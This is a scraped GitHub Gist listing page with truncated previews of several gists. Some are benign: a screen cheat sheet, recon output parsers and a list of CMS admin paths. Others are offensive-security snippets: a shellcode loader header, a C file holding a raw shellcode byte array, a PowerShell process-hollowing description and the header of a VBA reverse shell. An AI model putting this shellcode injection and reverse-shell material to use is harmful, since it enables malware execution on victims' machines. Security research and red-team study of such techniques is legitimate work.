Description | Command |
---|---|
Start a new session with session name | screen -S <session_name> |
List running sessions / screens | screen -ls |
Attach to a running session | screen -x |
Attach to a running session with name | screen -r |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# func to do the search w/ curl | |
# syntax `perform_search anti-fur_APIKEY gh_APIKEYAPIKEYAPIKEY` | |
perform_search() { | |
local search_term="$1" | |
local api_key="$2" | |
curl -s -H "Authorization: token $api_key" "https://api.github.com/search/repositories?q=$search_term" | jq '.items[].html_url' | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
WordPress: /wp-admin | |
Drupal: /admin | |
Joomla: /administrator | |
Magento: /admin | |
Concrete5: /dashboard | |
SilverStripe: /admin | |
Textpattern: /textpattern | |
MODX: /manager | |
Radiant CMS: /admin | |
Contao: /contao |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
''' | |
Greetings bug-slaying brothers of the pythonian blood. This script takes my httpx output after slamming in a bunch of subdomains | |
and organizes it so its a bit easier to read and work with. | |
The HTTPX payload I use first is: | |
httpx -sc -cl -title -bp -server -td -ip -cname -asn -cdn -vhost -fhr | anew httpx-quicc | |
This script will organize the data by status code and then from smallest to largest for each status code |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
''' | |
Get the excellent GoLinkFinder tool via github.com/0xsha/GoLinkFinder | |
... based on my boy here: https://github.com/GerbenJavado/LinkFinder | |
Anyways, this gives an excellent clean and parsed output after running GoLinkFinder on a gang of urls. | |
use this like: | |
python3 golinkfinderx.py urls.txt | |
''' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Saumyajeet Das | |
// Written/Compiled: Visual Studio 2022 | |
// Usage: midiOutOpen.exe <shellcode file> | |
#pragma comment(lib, "winmm.lib") | |
#include <stdio.h> | |
#include <Windows.h> | |
#include <mmsystem.h> | |
BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <wininet.h> | |
#include <stdio.h> | |
#pragma comment(lib, "wininet.lib") | |
// notepad.exe shellcode | |
char shellcode[] = { | |
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using | |
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle, | |
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle | |
and GetProcAddress to obtain the addresses of the other required Win32 API calls. | |
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state | |
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed | |
and the shellcode is executed enveloped within the trusted svchost.exe process. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' ******************************************************************************************************** | |
' | |
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources: | |
' | |
' * https://stackoverflow.com/questions/8670391 | |
' * https://stackoverflow.com/questions/43197814 | |
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/ | |
' | |
' The code demonstrates more complex usage example for calling Win32 API from VBA and should be used | |
' for educational purpose only. During development I was mainly interested whether the WSAData or the |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import re | |
import sys | |
import argparse | |
class Xor: | |
''' | |
Helper class for performing xor operations. |
NewerOlder